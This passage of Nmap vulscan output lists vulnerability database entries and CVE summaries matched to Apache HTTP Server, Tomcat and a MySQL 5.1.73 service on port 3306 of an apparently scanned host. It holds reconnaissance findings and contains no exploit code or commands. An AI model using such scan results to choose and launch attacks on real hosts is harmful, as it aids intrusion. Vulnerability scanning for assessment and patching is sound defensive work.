13968| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
13969| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
13970| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
13971| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
13972| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
13973| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
13974| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
13975| [13304] Apache Tomcat realPath.jsp Path Disclosure
13976| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
13977| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
13978| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
13979| [12848] Apache HTTP Server htdigest realm Variable Overflow
13980| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
13981| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
13982| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
13983| [12557] Apache HTTP Server prefork MPM accept Error DoS
13984| [12233] Apache Tomcat MS-DOS Device Name Request DoS
13985| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
13986| [12231] Apache Tomcat web.xml Arbitrary File Access
13987| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
13988| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
13989| [12178] Apache Jakarta Lucene results.jsp XSS
13990| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
13991| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
13992| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
13993| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
13994| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
13995| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
13996| [10471] Apache Xerces-C++ XML Parser DoS
13997| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
13998| [10068] Apache HTTP Server htpasswd Local Overflow
13999| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
14000| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
14001| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
14002| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
14003| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
14004| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
14005| [9717] Apache HTTP Server mod_cookies Cookie Overflow
14006| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
14007| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
14008| [9714] Apache Authentication Module Threaded MPM DoS
14009| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
14010| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
14011| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
14012| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
14013| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
14014| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
14015| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
14016| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
14017| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
14018| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
14019| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
14020| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
14021| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
14022| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
14023| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
14024| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
14025| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
14026| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
14027| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
14028| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
14029| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
14030| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
14031| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
14032| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
14033| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
14034| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
14035| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
14036| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
14037| [9208] Apache Tomcat .jsp Encoded Newline XSS
14038| [9204] Apache Tomcat ROOT Application XSS
14039| [9203] Apache Tomcat examples Application XSS
14040| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
14041| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
14042| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
14043| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
14044| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
14045| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
14046| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
14047| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
14048| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
14049| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
14050| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
14051| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
14052| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
14053| [7611] Apache HTTP Server mod_alias Local Overflow
14054| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
14055| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
14056| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
14057| [6882] Apache mod_python Malformed Query String Variant DoS
14058| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
14059| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
14060| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
14061| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
14062| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
14063| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
14064| [5526] Apache Tomcat Long .JSP URI Path Disclosure
14065| [5278] Apache Tomcat web.xml Restriction Bypass
14066| [5051] Apache Tomcat Null Character DoS
14067| [4973] Apache Tomcat servlet Mapping XSS
14068| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
14069| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
14070| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
14071| [4568] mod_survey For Apache ENV Tags SQL Injection
14072| [4553] Apache HTTP Server ApacheBench Overflow DoS
14073| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
14074| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
14075| [4383] Apache HTTP Server Socket Race Condition DoS
14076| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
14077| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
14078| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
14079| [4231] Apache Cocoon Error Page Server Path Disclosure
14080| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
14081| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
14082| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
14083| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
14084| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
14085| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
14086| [3322] mod_php for Apache HTTP Server Process Hijack
14087| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
14088| [2885] Apache mod_python Malformed Query String DoS
14089| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
14090| [2733] Apache HTTP Server mod_rewrite Local Overflow
14091| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
14092| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
14093| [2149] Apache::Gallery Privilege Escalation
14094| [2107] Apache HTTP Server mod_ssl Host: Header XSS
14095| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
14096| [1833] Apache HTTP Server Multiple Slash GET Request DoS
14097| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
14098| [872] Apache Tomcat Multiple Default Accounts
14099| [862] Apache HTTP Server SSI Error Page XSS
14100| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
14101| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
14102| [845] Apache Tomcat MSDOS Device XSS
14103| [844] Apache Tomcat Java Servlet Error Page XSS
14104| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
14105| [838] Apache HTTP Server Chunked Encoding Remote Overflow
14106| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
14107| [775] Apache mod_python Module Importing Privilege Function Execution
14108| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
14109| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
14110| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
14111| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
14112| [637] Apache HTTP Server UserDir Directive Username Enumeration
14113| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
14114| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
14115| [562] Apache HTTP Server mod_info /server-info Information Disclosure
14116| [561] Apache Web Servers mod_status /server-status Information Disclosure
14117| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
14118| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
14119| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
14120| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
14121| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
14122| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
14123| [376] Apache Tomcat contextAdmin Arbitrary File Access
14124| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
14125| [222] Apache HTTP Server test-cgi Arbitrary File Access
14126| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
14127| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
14128|_
14129 3306/tcp open mysql MySQL 5.1.73
14130| vulscan: VulDB - https://vuldb.com:
14131| [11948] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Error Handling Crash denial of service
14132| [11945] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 InnoDB memory corruption
14133| [11944] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Optimizer Crash denial of service
14134| [11941] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 Privileges Crash denial of service
14135| [11939] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 Optimizer Crash denial of service
14136| [11938] Oracle MySQL Server up to 5.1.71/5.5.33/5.6.13 Locking Crash denial of service
14137| [11937] Oracle MySQL Server up to 5.1.72/5.5.34/5.6.14 InnoDB Crash denial of service
14138| [10819] Oracle MySQL Server up to 5.1.70/5.5.32/5.6.12 Optimizer memory corruption
14139| [100543] Oracle MySQL up to 5.1.40 Connector/J privilege escalation
14140| [100209] Oracle MySQL Connectors up to 5.1.41 Connector/J unknown vulnerability
14141| [74949] Oracle MySQL Connectors up to 5.1.34 Connector/J unknown vulnerability
14142| [10818] Oracle MySQL Server up to 5.1/5.5.22 Optimizer denial of service
14143| [9665] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Options denial of service
14144| [9663] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 Server Optimizer denial of service
14145| [9660] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 Full Text Search denial of service
14146| [9655] Oracle MySQL Server up to 5.1.69/5.5.31/5.6.11 GIS Crash denial of service
14147| [8418] Oracle MySQL Server up to 5.1.67/5.5.29/5.6.10 Server Locking unknown vulnerability
14148| [8416] Oracle MySQL Server up to 5.1.63 Server Types unknown vulnerability
14149| [8410] Oracle MySQL Server up to 5.1.67/5.5.29 Server XML denial of service
14150| [8408] Oracle MySQL Server up to 5.1.67/5.5.29 Server Partition unknown vulnerability
14151| [8407] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Optimizer unknown vulnerability
14152| [8406] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 InnoDB unknown vulnerability
14153| [8405] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Information Schema unknown vulnerability
14154| [8403] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Data Manipulation Language unknown vulnerability
14155| [8400] Oracle MySQL Server up to 5.1.68/5.5.30/5.6.10 Server Privileges unknown vulnerability
14156| [8399] Oracle MySQL Server up to 5.1.66/5.5.28 Server Privileges unknown vulnerability
14157| [8398] Oracle MySQL Server up to 5.1.67/5.5.29 unknown vulnerability
14158| [8397] Oracle MySQL Server up to 5.1.67/5.5.29/5.6.10 Information Schema unknown vulnerability
14159| [8396] Oracle MySQL Server up to 5.1.67/5.5.29 Server Locking unknown vulnerability
14160| [7428] Oracle MySQL Server up to 5.1.66/5.5.28 Optimizer unknown vulnerability
14161| [7427] Oracle MySQL Server up to 5.1.66/5.5.28 unknown vulnerability
14162| [7425] Oracle MySQL Server up to 5.1.66/5.5.28 InnoDB unknown vulnerability
14163| [7423] Oracle MySQL Server up to 5.1.66/5.5.28 Locking unknown vulnerability
14164| [7422] Oracle MySQL Server up to 5.1.66/5.5.28 unknown vulnerability
14165| [7421] Oracle MySQL Server up to 5.1.66/5.1.28 Replication unknown vulnerability
14166| [7418] Oracle MySQL Server up to 5.1.66/5.5.28 Server Optimizer unknown vulnerability
14167| [7417] Oracle MySQL Server up to 5.1.66/5.5.28 Information Schema unknown vulnerability
14168| [7416] Oracle MySQL Server up to 5.1.65/5.5.27 GIS Extension denial of service
14169| [7415] Oracle MySQL Server up to 5.1.66/5.5.28 Privileges Stack-based memory corruption
14170| [6795] Oracle MySQL Server up to 5.1.64/5.5.26 Server Replication denial of service
14171| [6794] Oracle MySQL Server up to 5.1.63/5.5.25 Server Full Text Search denial of service
14172| [6791] Oracle MySQL Server up to 5.1.65/5.5.27 Server Optimizer denial of service
14173| [6790] Oracle MySQL Server up to 5.1.64/5.5.26 Server Optimizer denial of service
14174| [6788] Oracle MySQL Server up to 5.1.63/5.5.25 InnoDB Plugin denial of service
14175| [6787] Oracle MySQL Server up to 5.1.63/5.5.25 InnoDB unknown vulnerability
14176| [6785] Oracle MySQL Server up to 5.1.65/5.5.27 denial of service
14177| [6784] Oracle MySQL Server up to 5.1.64/5.5.26 Protocol unknown vulnerability
14178| [6783] Oracle MySQL Server up to 5.1.64/5.5.26 Information Schema memory corruption
14179| [5783] Oracle MySQL Server up to 5.1.62/5.5.22 Server Optimizer denial of service
14180| [5782] Oracle MySQL Server up to 5.1.62/5.5.23 Server Optimizer denial of service
14181| [5779] Oracle MySQL Server up to 5.1.62/5.5.23 GIS Extension unknown vulnerability
14182| [5159] Oracle MySQL Server up to 5.1.61/5.5.21 Optimizer denial of service
14183| [5158] Oracle MySQL Server up to 5.1.61/5.5.21 DML denial of service
14184| [5151] Oracle MySQL Server up to 5.1.60/5.5.19 MyISAM denial of service
14185| [5981] Oracle MySQL Server 5.1.62/5.5.23 Sort Order Index Calculation denial of service
14186| [5226] Oracle MySQL Server 5.1.x/5.5.x denial of service
14187| [5225] Oracle MySQL Server 5.1.x/5.5.x denial of service
14188| [5224] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14189| [5223] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14190| [5222] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14191| [5221] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14192| [5220] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14193| [5219] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14194| [5218] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14195| [5217] Oracle MySQL Server 5.1.x/5.5.x unknown vulnerability
14196| [56085] MySQL up to 5.1.25 init_from_wkb denial of service
14197| [56084] MySQL up to 5.1.25 Stored Procedure denial of service
14198| [56080] MySQL up to 5.1.25 Stored denial of service
14199| [56025] MySQL up to 5.1.25 Crash denial of service
14200| [56024] MySQL up to 5.1.25 store denial of service
14201| [56023] MySQL up to 5.1.25 Crash denial of service
14202| [56022] MySQL up to 5.1.25 Crash denial of service
14203| [56021] MySQL up to 5.1.25 Uninitialized Memory denial of service
14204| [56020] MySQL up to 5.1.25 Crash denial of service
14205| [56019] MySQL up to 5.1.25 Crash denial of service
14206| [56018] mysql up to 5.1.25 Configuration Parameter denial of service
14207| [54026] MySQL up to 5.1.25 Crash denial of service
14208| [53212] mysql 5.1.45 mysql_uninstall_plugin unknown vulnerability
14209| [3469] Sun MySQL 5.1.23 Bk InnoDB denial of service
14210| [41090] MySQL Mysql Community Server up to 5.1.4 unknown vulnerability
14211| [36814] MySQL up to 5.1.17 information disclosure
14212| [36813] mysql up to 5.1.17 thd::db_access denial of service
14213| [36812] MySQL up to 5.1.17 unknown vulnerability
14214|
14215| MITRE CVE - https://cve.mitre.org:
14216| [CVE-2013-3808] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
14217| [CVE-2013-3804] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14218| [CVE-2013-3802] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Full Text Search.
14219| [CVE-2013-2392] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14220| [CVE-2013-2391] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows local users to affect confidentiality and integrity via unknown vectors related to Server Install.
14221| [CVE-2013-2389] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
14222| [CVE-2013-2378] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
14223| [CVE-2013-2375] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
14224| [CVE-2013-1861] MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, and 5.1.x before 5.1.68, and Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote attackers to cause a denial of service (crash) via a crafted geometry feature that specifies a large number of points, which is not properly handled when processing the binary representation of this feature, related to a numeric calculation error.
14225| [CVE-2013-1555] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, and 5.5.29 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
14226| [CVE-2013-1552] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
14227| [CVE-2013-1548] Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Types.
14228| [CVE-2013-1544] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
14229| [CVE-2013-1532] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
14230| [CVE-2013-1531] Unspecified vulnerability in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Privileges.
14231| [CVE-2013-1521] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Locking.
14232| [CVE-2013-1506] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Locking.
14233| [CVE-2013-1492] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.30, has unspecified impact and attack vectors, a different vulnerability than CVE-2012-0553.
14234| [CVE-2013-0389] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14235| [CVE-2013-0385] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows local users to affect confidentiality and integrity via unknown vectors related to Server Replication.
14236| [CVE-2013-0384] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
14237| [CVE-2013-0383] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote attackers to affect availability via unknown vectors related to Server Locking.
14238| [CVE-2013-0375] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.1.28 and earlier, allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Server Replication.
14239| [CVE-2012-5615] MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a, 5.3.11, 5.2.13, 5.1.66, and possibly other versions, generates different error messages with different time delays depending on whether a user name exists, which allows remote attackers to enumerate valid usernames.
14240| [CVE-2012-5614] Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (mysqld crash) via a SELECT command with an UpdateXML command containing XML with a large number of unique, nested elements.
14241| [CVE-2012-5611] Stack-based buffer overflow in the acl_get function in Oracle MySQL 5.5.19 and other versions through 5.5.28, and 5.1.53 and other versions through 5.1.66, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
14242| [CVE-2012-5060] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.65 and earlier and 5.5.27 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
14243| [CVE-2012-4414] Multiple SQL injection vulnerabilities in the replication code in Oracle MySQL possibly before 5.5.29, and MariaDB 5.1.x through 5.1.62, 5.2.x through 5.2.12, 5.3.x through 5.3.7, and 5.5.x through 5.5.25, allow remote authenticated users to execute arbitrary SQL commands via vectors related to the binary log. NOTE: as of 20130116, Oracle has not commented on claims from a downstream vendor that the fix in MySQL 5.5.29 is incomplete.
14244| [CVE-2012-3197] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
14245| [CVE-2012-3180] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14246| [CVE-2012-3177] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server.
14247| [CVE-2012-3173] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB Plugin.
14248| [CVE-2012-3167] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Full Text Search.
14249| [CVE-2012-3166] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
14250| [CVE-2012-3163] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
14251| [CVE-2012-3160] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows local users to affect confidentiality via unknown vectors related to Server Installation.
14252| [CVE-2012-3158] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Protocol.
14253| [CVE-2012-3150] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14254| [CVE-2012-2749] MySQL 5.1.x before 5.1.63 and 5.5.x before 5.5.24 allows remote authenticated users to cause a denial of service (mysqld crash) via vectors related to incorrect calculation and a sort order index.
14255| [CVE-2012-2122] sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
14256| [CVE-2012-2102] MySQL 5.1.x before 5.1.62 and 5.5.x before 5.5.22 allows remote authenticated users to cause a denial of service (assertion failure and mysqld abort) by deleting a record and using HANDLER READ NEXT.
14257| [CVE-2012-1734] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14258| [CVE-2012-1705] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14259| [CVE-2012-1703] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14260| [CVE-2012-1702] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote attackers to affect availability via unknown vectors.
14261| [CVE-2012-1690] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14262| [CVE-2012-1689] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.22 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
14263| [CVE-2012-1688] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability, related to Server DML.
14264| [CVE-2012-0882] Buffer overflow in yaSSL, as used in MySQL 5.5.20 and possibly other versions including 5.5.x before 5.5.22 and 5.1.x before 5.1.62, allows remote attackers to execute arbitrary code via unspecified vectors, as demonstrated by VulnDisco Pack Professional 9.17. NOTE: as of 20120224, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. NOTE: due to lack of details, it is not clear whether this issue is a duplicate of CVE-2012-0492 or another CVE.
14265| [CVE-2012-0583] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.60 and earlier, and 5.5.19 and earlier, allows remote authenticated users to affect availability, related to MyISAM.
14266| [CVE-2012-0574] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors.
14267| [CVE-2012-0572] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
14268| [CVE-2012-0553] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.28, has unspecified impact and attack vectors, a different vulnerability than CVE-2013-1492.
